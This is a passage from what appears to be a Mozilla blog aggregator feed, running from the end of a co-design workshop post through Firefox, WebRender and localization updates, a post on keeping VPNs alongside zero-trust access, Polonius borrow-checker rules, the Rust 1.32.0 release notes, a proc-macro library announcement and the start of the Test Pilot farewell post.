The workshop was developed by a user researcher, designers, and a content strategist. We included a community manager and program managers, but we did not include engineers in the planning process (other than providing updates). One of the engineering managers said that it would have been great to have engineers present to help with ideation and hear from creators first-hand. If we were to do a design workshop again, we would be sure to have a genuinely interdisciplinary set of participants, including more Mozilla staff engineers.

And with that…

We hope that this blog post helps you create a co-design workshop that is interdisciplinary, diverse, caring of participants’ perspectives, and just the right length.

Acknowledgements

Much gratitude to our colleagues who created the workshop with us and helped us edit this blog post! Thanks to Amy Tsay, Caitlin Neiman, Jorge Villalobos, Kev Needham, Stuart Colville, Mike Conca, and Gemma Petrie.

References

[1] Sanders, Elizabeth B-N., and Pieter Jan Stappers. “Co-creation and the new landscapes of design.” Co-design 4.1 (2008): 5–18.

[2] “How to Conduct a Cognitive Walkthrough.” The Interaction Design Foundation, 2018, www.interaction-design.org/literature/article/how-to-conduct-a-cognitive-walkthrough.

[3] Gray, Dave. “6–8–5.” Gamestorming, 2 June 2015, gamestorming.com/6–8–5s/.

[4] Hsieh, Tina. “8 Tips for Hosting Your First Participatory Workshop.” Medium.com, Firefox User Experience, 20 Sept. 2018, medium.com/firefox-ux/8-tips-for-hosting-your-first-participatory-workshop-f63856d286a0.

[5] “Disney Brainstorming Method: Dreamer, Realist, and Spoiler.” Idea Sandbox, idea-sandbox.com/blog/disney-brainstorming-method-dreamer-realist-and-spoiler/.


Reflections on a co-design workshop was originally published in Firefox User Experience on Medium, where people are continuing the conversation by highlighting and responding to this story.

Firefox NightlyThese Weeks in Firefox: Issue 51

Highlights

Friends of the Firefox team

Introductions

  • New Student Project: Fluent Migrations (watch out for email)

Resolved bugs (excluding employees)

Project Updates

Add-ons / Web Extensions

  • Ongoing work on:
    • User opt-in for extensions in private browsing windows
    • Rebuilding about:addons in HTML
  • Old Lightweight Themes (LWTs) on addons.mozilla.org will be converted to XPI packaged themes next week

Browser Architecture

Developer Tools

Huge shoutout to debugger community for all of their work during the winter break!

Console
Debugger
Layout Tools
Remote Debugging
Fission Support
Other

Fluent

  • New student project started up last week. Goals are:
    • convert more strings to Fluent
    • increase tool support
    • research porting the fluent-rs parser to wasm and replacing the JS Fluent parser with the wasm fluent-rs parser

Lint

Performance

  • In Q1 we are focusing our efforts on startup performance. This time we’ll care both about first paint performance (which already received optimization efforts previously and is close to parity with Chrome) and the time to render the home page.
  • Doug landed his document splitting work that should enable faster rendering and is investigating creating a warmup service to preload Firefox files when the OS starts.
  • Felipe’s tab animation patch is going through review.
  • The code of the old about:performance is gone (both front-end and back-end pieces) and some test coverage was added.
  • Gijs continued his browser adjustment work (adding telemetry and about:support visibility), improved Pocket’s startup behavior, and removed some more Feed code.
  • mconley is unblocking enabling the background process priority manager, by removing the HAL stuff that was leftover from FxOS.
  • Perf.html improvements deployed recently:
    • Tooltips in the thread activity graph indicating the meaning of colors (most frequent request we got during the all-hands!)
      • A tooltip is floating over the colour-coded visualization of processing time in perf.html. The tooltip describes what the hovered colour means.

        This was a top request from users of the Profiler!

    • Memory track
      • A new track in the perf.html profiler view shows a graph of memory usage during the recorded time.

        This should help us notice memory allocation patterns in profiles.

    • Category colors in the stack chart
      • The stack chart is now colour coded, using the same colouring system as the thread tracks.

        This should help people narrow down slow code to the responsible components.

Privacy/Security

  • We’re eliminating some interesting performance regressions from enabling cookie restrictions by default.
  • Erica is working on another Shield study on content blocking breakage
  • Baku refactored some of URL-Classifier to prepare it for future endeavors, including a neat new way to manually classify URLs on about:url-classifier

Search and Navigation

Search
Quantum Bar
Places

Julien VehentMaybe don't throw away your VPN just yet...

Over the past few years I've followed the rise of the BeyondCorp project, Google's effort to move away from perimetric network security to identity-based access controls. The core principle of BeyondCorp is to require strong authentication to access resources rather than relying on the source IP a connection originates from. Don't trust the network, authenticate all accesses, are requirements in a world where your workforce is highly distributed and connects to privileged resources from untrusted networks every day. They are also a defense against office and datacenter networks that are rarely secure enough for the data they have access to. BeyondCorp, and zero trust networks, are good for security.

This isn't new. Most modern organizations have completely moved away from trusting source IPs and rely on authentication to grant access to data. But BeyondCorp goes further by recommending that your entire infrastructure should have a foot on the Internet and protect access using strong authentication. The benefits of this approach are enormous: employees can be fully mobile and continue to access privileged resources, and compromising an internal network is no longer sufficient to compromise the entire organization.

As a concept, this is good. And if you're hosting on GCP or are willing to proxy your traffic through GCP, you can leverage their Identity and Access Proxy to implement these concepts securely. But what about everyone else? Should you throw away your network security and put all your security in the authentication layer of your applications? Maybe not...

At Mozilla, we've long adopted single sign on, first using SAML, nowadays using OpenID Connect (OIDC). Most of our applications, both public facing and internal, require SSO to protect access to privileged resources. We never trust the network and always require strong authentication. And yet, we continue to maintain VPNs to protect our most sensitive admin panels.

"How uncool", I hear you object, "and here we thought you were all about DevOps and shit". And you would be correct, but I'm also pragmatic, and I can't count the number of times we've had authentication bugs that let our red team or security auditors bypass authentication. The truth is, even highly experienced programmers and operators make mistakes and will let a bug disable or fail to protect part of that one super sensitive page you never want to leave open to the internet. And I never blame them because SSO/OAuth/OIDC are massively complex protocols that require huge libraries that fail in weird and unexpected ways. I've never reached the point where I fully trust our SSO, because we find one of those auth bypass every other month. Here's the catch: they never lead to major security incidents because we put all our admin panels behind a good old VPN.

Those VPN that no one likes to use or maintain (me included) also provide a stable and reliable security layer that simply never fails. They are far from perfect, and we don't use them to authenticate users or grant access to resources, but we use them to cover our butts when the real authentication layer fails. So far, real world experience continues to support this model.

So, there, you have it: adopt BeyondCorp and zero trust networks, but also consider keeping your most sensitive resources behind a good old VPN (or an SSH jumphost, whatever works for you). VPNs are good at reducing your attack surface and adding an extra layer of protection to your infrastructure. You'll be thankful to have one the next time you find a bypass in your favorite auth library.

Mozilla GFXWebRender newsletter #36

Hi everyone! This week’s highlight is Glenn’s picture caching work which almost landed about a week ago and landed again a few hours ago. Fingers crossed! If you don’t know what picture caching means and are interested, you can read about it in the introduction of this newsletter’s season 01 episode 28.
On a more general note, the team continues focusing on the remaining list of blocker bugs which grows and shrinks depending on when you look, but the overall trend is looking good.

Without further ado:

Notable WebRender and Gecko changes

  • Bobby fixed unbounded interner growth.
  • Bobby overhauled the memory reporter.
  • Bobby added a primitive highlighting debug tool.
  • Bobby reduced code duplication around interners.
  • Matt and Jeff continued investigating telemetry data.
  • Jeff removed the minimum blob image size, yielding nice improvements on some talos benchmarks (18% raptor-motionmark-animometer-firefox linux64-qr opt and 7% raptor-motionmark-animometer-firefox windows10-64-qr opt).
  • kvark fixed a crash.
  • kvark reduced the number of vector allocations.
  • kvark improved the chasing debugging tool.
  • kvark fixed two issues with reference frame and scrolling.
  • Andrew fixed an issue with SVGs that embed raster images not rendering correctly.
  • Andrew fixed a mismatch between the size used during decoding images and the one we pass to WebRender.
  • Andrew fixed a crash caused by an interaction between blob images and shared surfaces.
  • Andrew avoided scene building caused by partially decoded images when possible.
  • Emilio made the build system take care of generating the ffi bindings automatically.
  • Emilio fixed some clipping issues.
  • Glenn optimized how picture caching handle world clips.
  • Glenn fixed picture caching tiles being discarded incorrectly.
  • Glenn split primitive preparation into a separate culling pass.
  • Glenn fixed some invalidation issues.
  • Glenn improved display list correlation.
  • Glenn re-landed picture caching.
  • Doug improved the way we deal with document splitting to allow more than two documents.

Ongoing work

The team keeps going through the remaining blockers (14 P2 bugs and 29 P3 bugs at the time of writing).

Enabling WebRender in Firefox Nightly

In about:config, set the pref “gfx.webrender.all” to true and restart the browser.

Reporting bugs

The best place to report bugs related to WebRender in Firefox is the Graphics :: WebRender component in bugzilla.
Note that it is possible to log in with a github account.

Mozilla Localization (L10N)L10n report: January edition

Welcome!

New localizers

Are you a locale leader and want us to include new members in our upcoming reports? Contact us!

New community/locales added

New content and projects

What’s new or coming up in Firefox desktop

The localization cycle for Firefox 66 in Nightly is approaching its end, and Tuesday (Jan 15) was the last day to get changes into Firefox 65 before it moves to release (Jan 29). These are the key dates for the next cycle:

  • January 28: Nightly will be bumped to version 67.
  • February 26: deadline to ship updates to Beta (Firefox 66).

As of January, localization of the Pocket add-on has moved back into the Firefox main project. That’s a positive change for localization, since it gives us a clearer schedule for updates, while before they were complex and sparse. All existing translations from the stand-alone process were imported into Mercurial repositories (and Pontoon).

In terms of prioritization, there are a couple of features to keep an eye on:

  • Profile per installation: with Firefox 67, Firefox will begin using a dedicated profile for each Firefox version (including Nightly, Beta, Developer Edition, and ESR). This will make Firefox more stable when switching between versions on the same computer and will also allow you to run different Firefox installations at the same time. This introduces a set of dialogs and web pages to warn the user about the change, and explain how to sync data between profiles. Unlike other features, this targets all versions, but Nightly users in particular, since they are more likely to have multiple profiles according to Telemetry data. That’s a good reason to prioritize these strings.
  • Security error pages: nothing is more frustrating than being unable to reach a website because of certificate issues. There are a lot of experiments happening around these pages and the associated user experience, both in Beta and Release, so it’s important to prioritize translations for these strings (they’re typically in netError.dtd).

What’s new or coming up in Test Pilot

As explained in this blog post, Test Pilot is reaching its end of life. The website localization has been updated in Pontoon to include messages around this change, while other experiments (Send, Monitor) will continue to exist as stand-alone projects. Screenshots is also going to see changes in the upcoming days, mostly on the server side of the project.

What’s new or coming up in mobile

Just like for Firefox desktop, the last day to get in localizations for Fennec 65 was Tuesday, Jan 15. Please see the desktop section above for more details.

Firefox iOS v15 localization deadline was Friday, January 11. The app should be released to everyone by Jan 29th, after a phased roll-out. This time around we’ve added seven new locales: Angika, Burmese, Corsican, Javanese, Nepali, Norwegian Bokmål and Sundanese. This means that we’re currently shipping 87 locales out of the 88 that are being localized – which is twice as more than when we first shipped the app. Congrats to all the voluntary localizers involved in this effort over the years!

And stay tuned for an update on the upcoming v16 l10n timeline soon.

We’re also still working with Lockbox Android team in order to get the project plugged in to Pontoon, and you can expect to see something come up in the next couple of weeks.

Firefox Reality project is going to be available and open for localization very soon too. We’re working out the specifics right now, and the timeline will be shared very soon and once everything is ironed out.

What’s new or coming up in web projects

Mozilla.org has a few updates.

  • Navigation bar: The new navigation.lang file contains strings for the redesigned navigation bar. When the language completion rate reaches 80%+, the new layout will be switched on. Try to get your locale completed by the time it is switched over.
  • Content Blocking Tour with updated UIs will go live on 29 Jan. Catch up all the updates by completing the firefox/tracking-protection-tour.lang file before then.

What’s new or coming up in Foundation projects

Mozilla’s big end-of-year push for donations has passed, and thanks in no small part to your efforts, the Foundation’s financial situation is in a much better shape for this year to pick up the fight where they left it before the break. Thank you all for your help!

In these first days of 2019, the fundraising team takes the opportunity of the quiet time to modernize the donation receipts with a better email sent to donors and migrate the receipts to the same infrastructure used to send Mozilla & Firefox newsletters. Content for the new receipts should be exposed in the Fundraising project by the end of the month for the 10-15 locales with the most donations in 2018.

The Advocacy team is still working on the misinfo campaign in Europe, with a first survey coming up to be sent to the people subscribed to the Mozilla newsletter, to get a flavor of where opinion lies with their attitudes to misinformation at the moment. Next steps will include launching a campaign about political ads ahead of the EU elections then promote anti-disinformation tools. Let’s do this!

What’s new or coming up in Support

What’s new or coming up in Pontoon

We re-launched the ability to delete translations. First you need to reject a translation, and then click on the trash can icon, which only appears next to rejected translations. The delete functionality has been replaced by the reject functionality, but over time it became obvious there are various use cases for both features to co-exist. See bug 1397377 for more details about why we first removed and then restored this feature.

Events

  • Want to showcase an event coming up that your community is participating in? Reach out to any l10n-driver and we’ll include that (see links to emails at the bottom of this report)

Friends of the Lion

Image by Elio Qoshi

  • Sofwath came to us right after the new year holiday break through the Common Voice project. As the locale manager of Dhivehi, the official language of Maldives, he gathered all the necessary information in order to onboard several new contributors. Together, they almost completed the web site localization in a matter of days. They are already looking into government sources that are public for sentence collection. Kudos to the entire community!

 

Know someone in your l10n community who’s been doing a great job and should appear here? Contact on of the l10n-drivers and we’ll make sure they get a shout-out (see list at the bottom)!

Useful Links

Questions? Want to get involved?

Did you enjoy reading this report? Let us know how we can improve by reaching out to any one of the l10n-drivers listed above.

Niko MatsakisPolonius and region errors

Now that NLL has been shipped, I’ve been doing some work revisiting the Polonius project. Polonius is the project that implements the “alias-based formulation” described in my older blogpost. Polonius has come a long way since that post; it’s now quite fast and also experimentally integrated into rustc, where it passes the full test suite.

However, polonius as described is not complete. It describes the core “borrow check” analysis, but there are a number of other checks that the current implementation checks which polonius ignores:

  • Polonius does not account for moves and initialization.
  • Polonius does not check for relations between named lifetimes.

This blog post is focused on the second of those bullet points. It covers the simple cases; hopefully I will soon post a follow-up that targets some of the more complex cases that can arise (specifically, dealing with higher-ranked things).

Brief Polonius review

If you’ve never read the the original Polonius post, you should probably do so now. But if you have, let me briefly review some of the key details that are relevant to this post:

  • Instead of interpreting the 'a notation as the lifetime of a reference (i.e., a set of points), we interpret 'a as a set of loans. We refer to 'a as a “region”1 in order to emphasize this distinction.
  • We call 'a: 'b a subset relation; it means that the loans in 'a must be a subset of the loans in 'b. We track the required subset relations at each point in the program.
  • A loan comes from some borrow expression like &foo. A loan L0 is “live” if some live variable contains a region 'a whose value includes L0. When a loan is live, the “terms of the loan” must be respected: for a shared borrow like &foo, that means the path that was borrowed (foo) cannot be mutated. For a mutable borrow, it means that the path that was borrowed cannot be accessed at all.
    • If an access occurs that violates the terms of a loan, that is an error.

Running Example 1

Let’s give a quick example of some code that should result in an error, but which would not if we only considered the errors that polonius reports today:

fn foo<'a, 'b>(x: &'a [u32], y: &'b [u32]) -> &'a u32 {
    &y[0]
}

Here, we declared that we are returning a &u32 with lifetime 'a (i.e., borrowed from x) but in fact we are returning data with lifetime 'b (i.e., borrowed from y).

Slightly simplified, the MIR for this function looks something like this.

fn foo(_1: &'a [u32], _2: &'b [u32]) -> &'a [u32] {
  _0 = &'X (*_2)[const 0usize]; // S0
  return;                       // S1
}  

As you can see, there’s only really one interesting statement; it borrows from _2 and stores the result into _0, which is the special “return slot” in MIR.

In the case of the parameters _1 and _2, the regions come directly from the method signature. For regions appearing in the function body, we create fresh region variables – in this case, only one, 'X. 'X represents the region assigned to the borrow.

The relevant polonius facts for this function are as follows:

  • base_subset('b, 'X, mid(S0)) – as described in the NLL RFC, “re-borrowing” the referent of a reference (i.e., *_2) creates a subset relation between the region of the region (here, 'b) and the region of the borrow (here, 'X). Written in the notation of the [NLL RFC], this would be the relation 'X: 'b @ mid(S0).
  • base_subset('X, 'a, mid(S0)) – the borrow expression in S0 produces a result of type &'X u32. This is then assigned to _0, which has the type &'a [u32]. The subtyping rules require that 'X: 'a.

Combining the two base_subset relations allows us to conclude that the full subset relation includes subset('b, 'a, mid(S0)) – that is, for the function to be valid, the region 'b must be a subset of the region 'a. This is an error because the regions 'a and 'b are actually parameters to foo; in other words, foo must be valid for any set of regions 'a and 'b, and hence we cannot know if there is a subset relationship between them. This is a different sort of error than the “illegal access” errors that Polonius reported in the past: there is no access at all, in fact, simply subset relations.

Placeholder regions

There is an important distinction between named regions like 'a and 'b and the region 'X we created for a borrow. The definition of foo has to be true for all regions 'a and 'b, but for a region like 'X there only has to be some valid value. This difference is often called being universally quantified (true for all regions) versus existentially quantified (true for some region).

In this post, I will call universally quantified regions like 'a and 'b “placeholder” regions. This is because they don’t really represent a known quantity of loans, but rather a kind of “placeholder” for some unknown set of loans.

We will include a base fact that helps us to identify placeholder regions:

.decl placeholder_region(R1: region)
.input placeholder_region

This fact is true for any placeholder region. So in our example we might have

placeholder_region('a).
placeholder_region('b).

Note that the actual polonius impl already includes a relation like this2, because we need to account for the fact that placeholder regions are “live” at all points in the control-flow graph, as we always assume there may be future uses of them that we cannot see.

Representing known relations

Even placeholder regions are not totally unknown though. The function signature will often include where clauses (or implied bounds) that indicate some known relationships between placeholder regions. For example, if foo included a where clause like where 'b: 'a, then it would be perfectly legal.

We can represent the known relationships using an input:

.decl known_base_subset(R1: region, R2: region)
.input known_base_subset

Naturally these known relations are transitive, so we can define a known_subset rule to encode that:

.decl known_subset(R1: region, R2: region)

known_subset(R1, R2) :- known_base_subset(R1, R2).
known_subset(R1, R3) :- known_base_subset(R1, R2), known_subset(R2, R3).

In our example of foo, there are no where clauses nor implied bounds, so these relations are empty. If there were a where clause like where 'b: 'a, however, then we would have a known_base_subset('b, 'a) fact. Similarly, per out implied bounds rules, such an input fact might be derived from an argument with a type like &'a &'b u32, where there are ‘nested’ regions.

Detecting illegal subset relations

We can now extend the polonius rules to report errors for cases like our running example. The basic idea is this: if the function requires a subset relationship 'r1: 'r2 between two placeholder regions 'r1 and 'r2, then it must be a “known subset”, or else we have an error. We can encode this like so:

.decl subset_error(R1: region, R2: region, P:point)

subset_error(R1, R2, P) :-
  subset(R1, R2, P),      // `R1: R2` required at `P`
  placeholder_region(R1), // `R1` is a placeholder
  placeholder_region(R2), // `R2` is also a placeholder
  !known_subset(R1, R2).  // `R1: R2` is not a "known subset" relation.

In our example program, we can clearly derive subset_error('b, 'a, mid(S0)), and hence we have an error:

  • we saw earlier that subset('a, 'b, mid(S0)) holds
  • as 'a is a placeholder region, placeholder_region('a) will appear in the input (same for 'b)
  • finally, the known_base_subset (and hence known_subset) relation in our example is empty

Sidenote on negative reasoning and stratification. This rule makes use of negative reasoning in the form of the !known_subset(R1, R2) predicate. Negative reasoning is fine in datalog so long as the program is “stratified” – in particular, we must be able to compute the entire known_subset relation without having to compute subset_error. In this case, the program is trivialy stratified – known_subset depends only on the input relation known_base_subset.)

Observation about borrowing local data

It is interesting to walk through a different example. This is another case where we expect an error, but in this case the error arises because we are returning a reference to the stack:

fn bar<'a>(x: &'a [u32]) -> &'a u32 {
    let stack_slot = x[0];
    &stack_slot
}

Polonius will report an error for this case, but not because of the mechanisms in this blog post. What happens instead is that we create a loan for the borrow expression &stack_slot, we’ll call it L0. When the borrow is returned, this loan L0 winds up being a member of the 'a region. It is therefore “live” when the storage for stack_slot is popped from the stack, which is an error: you can’t pop the storage for a stack slot where there are live loans that have reference it.

Conclusion

This post describes a simple extension to the polonius rules that covers errors arising from subset relations. Unlike the prior rules, these errors are not triggered by any “access”, but rather simply the creation of a (transitive) subset relation between two placeholder regions.

Unfortunately, this is not the complete story around region checking errors. In particular, this post ignored subset relations that can arise from “higher-ranked” types like for<'a> fn(&'a u32). Handling these properly requires us to introduce a bit more logic and will be covered in a follow-up.

Comments, if any, should be posted in the internals thread dedicated to my previous polonius post

Appendix: A (potentially) more efficient formulation

The subset_error formulation above relied on the transitive subset relation to work, because we wanted to report errors any time that one placeholder wound up being forced to be a subset of another. In the more optimized polonius implementations, we don’t compute the full transitive relation, so it might be useful to create a new relation subset_placeholder that is specific to placeholder regions:

.decl subset_placeholder(R1: region, R2: region, P:point)

The idea is that subset_placeholder(R1, R2, P) means that, at the point P, we know that R1: R2 must hold, where R1 is a placeholder. You can express this via a “base” rule:

subset_placeholder(R1, R2, P) :-
  subset(R1, R2, P),      // `R1: R2` required at `P`
  placeholder_region(R1). // `R1` is a placeholder

and a transitive rule:

subset_placeholder(R1, R3, P) :-
  subset_placeholder(R1, R2, P), // `R1: R2` at P where `R1` is a placeholder
  subset(R2, R3, P).      // `R2: R3` required at `P`

Then we reformulate the subset_error rule to be based on subset_placeholder:

.decl subset_error(R1: region, R2: region, P:point)

subset_error(R1, R2, P) :-
  subset_placeholder(R1, R2, P), // `R1: R2` required at `P`
  placeholder_region(R2), // `R2` is also a placeholder
  !known_subset(R1, R2).  // `R1: R2` is not a "known subset" relation.

Footnotes

  1. The term “region” is not an especially good fit, but it’s common in academia.

  2. Currently called universal_region, though I plan to rename it.

The Rust Programming Language BlogAnnouncing Rust 1.32.0

The Rust team is happy to announce a new version of Rust, 1.32.0. Rust is a programming language that is empowering everyone to build reliable and efficient software.

If you have a previous version of Rust installed via rustup, getting Rust 1.32.0 is as easy as:

$ rustup update stable

If you don't have it already, you can get rustup from the appropriate page on our website, and check out the detailed release notes for 1.32.0 on GitHub.

As a small side note, rustup has seen some new releases lately! To update rustup itself, run rustup self update.

What's in 1.32.0 stable

Rust 1.32.0 has a few quality of life improvements, switches the default allocator, and makes additional functions const. Read on for a few highlights, or see the detailed release notes for additional information.

The dbg macro

First up, a quality of life improvement. Are you a "print debugger"? If you are, and you've wanted to print out some value while working on some code, you have to do this:

let x = 5;

println!("{:?}", x);

// or maybe even this
println!("{:#?}", x);

This isn't the largest speed bump, but it is a lot of stuff to simply show the value of x. Additionally, there's no context here. If you have several of these println!s, it can be hard to tell which is which, unless you add your own context to each invocation, requiring even more work.

In Rust 1.32.0, we've added a new macro, dbg!, for this purpose:

fn main() {
    let x = 5;
    
    dbg!(x);
}

If you run this program, you'll see:

[src/main.rs:4] x = 5

You get the file and line number of where this was invoked, as well as the name and value. Additionally, println! prints to the standard output, so you really should be using eprintln! to print to standard error. dbg! does the right thing and goes to stderr.

It even works in more complex circumstances. Consider this factorial example:

fn factorial(n: u32) -> u32 {
    if n <= 1 {
        n
    } else {
        n * factorial(n - 1)
    }
}

If we wanted to debug this, we might write it like this with eprintln!:

fn factorial(n: u32) -> u32 {
    eprintln!("n: {}", n);

    if n <= 1 {
        eprintln!("n <= 1");

        n
    } else {
        let n = n * factorial(n - 1);

        eprintln!("n: {}", n);

        n
    }
}

We want to log n on each iteration, as well as have some kind of context for each of the branches. We see this output for factorial(4):

n: 4
n: 3
n: 2
n: 1
n <= 1
n: 2
n: 6
n: 24

This is servicable, but not particularly great. Maybe we could work on how we print out the context to make it more clear, but now we're not debugging our code, we're figuring out how to make our debugging code better.

Consider this version using dbg!:

fn factorial(n: u32) -> u32 {
    if dbg!(n <= 1) {
        dbg!(1)
    } else {
        dbg!(n * factorial(n - 1))
    }
}

We simply wrap each of the various expressions we want to print with the macro. We get this output instead:

[src/main.rs:3] n <= 1 = false
[src/main.rs:3] n <= 1 = false
[src/main.rs:3] n <= 1 = false
[src/main.rs:3] n <= 1 = true
[src/main.rs:4] 1 = 1
[src/main.rs:5] n * factorial(n - 1) = 2
[src/main.rs:5] n * factorial(n - 1) = 6
[src/main.rs:5] n * factorial(n - 1) = 24
[src/main.rs:11] factorial(4) = 24

Because the dbg! macro returns the value of what it's debugging, instead of eprintln! which returns (), we need to make no changes to the structure of our code. Additionally, we have vastly more useful output.

That's a lot to say about a little macro, but we hope it improves your debugging experience! We are contining to work on support for gdb and friends as well, of course.

jemalloc is removed by default

Long, long ago, Rust had a large, Erlang-like runtime. We chose to use jemalloc instead of the system allocator, because it often improved performance over the default system one. Over time, we shed more and more of this runtime, and eventually almost all of it was removed, but jemalloc was not. We didn't have a way to choose a custom allocator, and so we couldn't really remove it without causing a regression for people who do need jemalloc.

Also, saying that jemalloc was always the default is a bit UNIX-centric, as it was only the default on some platforms. Notably, the MSVC target on Windows has shipped the system allocator for a long time.

Finally, while jemalloc usually has great performance, that's not always the case. Additionally, it adds about 300kb to every Rust binary. We've also had a host of other issues with jemalloc in the past. It has also felt a little strange that a systems language does not default to the system's allocator.

For all of these reasons, once Rust 1.28 shipped a way to choose a global allocator, we started making plans to switch the default to the system allocator, and allow you to use jemalloc via a crate. In Rust 1.32, we've finally finished this work, and by default, you will get the system allocator for your programs.

If you'd like to continue to use jemalloc, use the jemallocator crate. In your Cargo.toml:

jemallocator = "0.1.8"

And in your crate root:

#[global_allocator]
static ALLOC: jemallocator::Jemalloc = jemallocator::Jemalloc;

That's it! If you don't need jemalloc, it's not forced upon you, and if you do need it, it's a few lines of code away.

Final module improvements

In the past two releases, we announced several improvements to the module system. We have one last tweak landing in 1.32.0 and the 2018 edition. Nicknamed "uniform paths", it permits previously invalid import path statements to be resolved exactly the same way as non-import paths. For example:

enum Color { Red, Green, Blue }

use Color::*;

This code did not previously compile, as use statements had to start with super, self, or crate. Now that the compiler supports uniform paths, this code will work, and do what you probably expect: import the variants of the Color enum defined above the use statement.

With this change in place, we've completed our efforts at revising the module system. We hope you've been enjoying the simplified system so far!

Macro improvements

A few improvements to macros have landed in Rust 1.32.0. First, a new literal matcher was added:

macro_rules! m {
    ($lt:literal) => {};
}

fn main() {
    m!("some string literal");
}

literal matches against literals of any type; string literals, numeric literals, char literals.

In the 2018 edition, macro_rules macros can also use ?, like this:

macro_rules! bar {
    ($(a)?) => {}
}

The ? will match zero or one repetitions of the pattern, similar to the already-existing * for "zero or more" and + for "one or more."

Library stabilizations

We talked above about the dbg! macro, which is a big library addition. Beyond that, 19 functions were made const fns, and all integral numeric primitives now provide conversion functions to and from byte-arrays with specified endianness. These six functions are named to_<endian>_bytes and from_<endian>_bytes, where <endian> is one of:

  • ne - native endianness
  • le - little endian
  • be - big endian

See the detailed release notes for more details.

Cargo features

Cargo gained cargo c as an alias for cargo check, and now allows usernames in registry URLs.

See the detailed release notes for more.

Contributors to 1.32.0

Many people came together to create Rust 1.32.0. We couldn't have done it without all of you. Thanks!

Nick Cameronproc-macro-rules

I'm announcing a new library for procedural macro authors: proc-macro-rules (and on crates.io). It allows you to do macro_rules-like pattern matching inside a procedural macro. The goal is to smooth the transition from declarative to procedural macros (this works pretty well when used with the quote crate).

(This is part of my Christmas yak mega-shave. That might someday get a blog post of its own, but I only managed to shave about 1/3 of my yaks, so it might take till next Christmas).

Here's an example,

rules!(tokens => {
    ($finish:ident ($($found:ident)*) # [ $($inner:tt)* ] $($rest:tt)*) => {
        for f in found {
            do_something(finish, f, inner, rest[0]);
        }
    }
    (foo $($bar:expr)?) => {
        match bar {
            Some(e) => foo_with_expr(e),
            None => foo_no_expr(),
        }
    }
});

The example is kind of nonsense. The interesting thing is that the syntax is very similar to macro_rules macros. The patterns which are matched are exactly the same as in macro_rules (modulo bugs, of course). Metavariables in the pattern (e.g., $finish or $found in the first arm) are bound to fresh variables in the arm's body (e.g., finish and found). The types reflect the type of the metavariable (for example, $finish has type syn::Ident). Because $found occurs inside a $(...)*, it is matched multiple times and so has type Vec<syn::Ident>.

The syntax is:

rules!( $tokens:expr => { $($arm)* })

where $tokens evaluates to a TokenStream and the syntax of an $arm is given by

($pattern) => { $body }

or

($pattern) => $body,

where $pattern is a valid macro_rules pattern (which is not yet verified by the library, but should be) and $body is Rust code (i.e., an expression or block.

The intent of this library is to make it easier to write the 'frontend' of a procedural macro, i.e., to make parsing the input a bit easier. In particular to make it easy to convert a macro_rules macro to a procedural macro and replace a small part with some procedural code, without having to roll off the 'procedural cliff' and rewrite the whole macro.

As an example of converting macros, here is a declarative macro which is sort-of like the vec macro (example usage: let v = vec![a, b, c]):

macro_rules! vec {
    () => {
        Vec::new()
    };
    ( $( $x:expr ),+ ) => {
        {
            let mut temp_vec = Vec::new();
            $(
                temp_vec.push($x);
            )*
            temp_vec
        }
    };
}

Converting to a procedural macro becomes a mechanical conversion:

use quote::quote;
use proc_macro::TokenStream;
use proc_macro_rules::rules;

#[proc_macro]
pub fn vec(input: TokenStream) -> TokenStream {
    rules!(input.into() => {
        () => { quote! {
            Vec::new()
        }}
        ( $( $x:expr ),+ ) => { quote! {
            let mut temp_vec = Vec::new();
            #(
                temp_vec.push(#x);
            )*
            temp_vec
        }}
    }).into()
}

Note that we are using the quote crate to write the bodies of the match arms. That crate allows writing the output of a procedural macro in a similar way to a declarative macro by using quasi-quoting.

How it works

I'm going to dive in a little bit to the implementation because I think it is interesting. You don't need to know this to use proc-macro-rules, and if you only want to do that, then you can stop reading now.

rules is a procedural macro, using syn for parsing, and quote for code generation. The high-level flow is that we parse all code passed to the macro into an AST, then handle each rule in turn (generating a big if/else). For each rule, we make a pass over the rule to collect variables and compute their types, then lower the AST to a 'builder' AST (which duplicates some work at the moment), then emit code for the rule. That generated code includes Matches and MatchesBuilder structs to collect and store bindings for metavariables. We also generate code which uses syn to parse the supplied tokenstream into the Matches struct by pattern-matching the input.

The pattern matching is a little bit interesting: because we are generating code (rather than interpreting the pattern) the implementation is very different from macro_rules. We generate a DFA, but the pattern is not reified in a data structure but in the generated code. We only execute the matching code once, so we must be at the same point in the pattern for all potential matches, but they can be at different points in the input. These matches are represented in the MatchSet. (I didn't look around for a nice way of doing this, so there may be something much better, or I might have made an obvious mistake).

The key functions on a MatchSet are expect and fork. Both operate by taking a function from the client which operates on the input. expect compares each in-progress match with the input and if the input can be matched we continue; if it cannot, then the match is deleted. fork iterates over the in-progress matches, forking each one. One match is matched against the next element in the patten, and one is not. For example, if we have a pattern ab?c and a single match which has matched a in the input then we can fork and one match will attempt to match b then c, and one will just match c.

One interesting aspect of matching is handling metavariable matching in repeated parts of a pattern, e.g., in $($n:ident: $e: expr),*. Here we would repeatedly try to match $n:ident: $e: expr and find values for n and e, we then need to push each value into a Vec<Ident> and a Vec<Expr>. We call this 'hoisting' the variables (since we are moving out of a scope while converting T to U<T>). We generate code for this which uses an implementation of hoist in the Fork trait for each MatchesBuilder, a MatchesHandler helper struct for the MatchSet, and generated code for each kind of repeat which can appear in a pattern.

Firefox Test PilotAdios, Amigo

TL;DR Firefox Test Pilot is flying off into the sunset on January 22nd, 2019. Currently active experiments will remain installed for all users, and will be available on addons.mozilla.org after this date. Non-extension experiments like Firefox Lockbox and Firefox Send will continue in active development as standalone products. In fact, both products will have significant launches in the near future. Stay tuned for updates in the coming months.

<figcaption>The Idea Town logo</figcaption>

I’ve been involved with Test Pilot since the project’s inception (true story, we called it Idea Town at that point) almost four years ago, so this announcement is definitely bittersweet for me. Nevertheless, I think it’s the right move for Mozilla, Firefox and for the Test Pilot team.

In this post, I’ll talk about the why of Test Pilot’s termination, the impact of the program at Mozilla, and what happens next.

Why is this happening?

Here’s where I feel like our team can rest on our laurels a little bit. Test Pilot being disbanded is more-or-less a symptom of our program’s successes both in terms of products shipped and cultural impact within the Firefox organization.

Prototyping as a culture

When we founded Test Pilot, my teammates and I wanted to address a dilemma at Mozilla that felt particularly acute at the time: we didn’t have a great way to get new Firefox features to market quickly or get feedback in a timely manner. Firefox ships to hundreds of millions of people, and follows a conservative release cadence as a consequence. While this supports the overall quality of the browser, it can be difficult to get feedback or understand user attitudes in service of feature development.

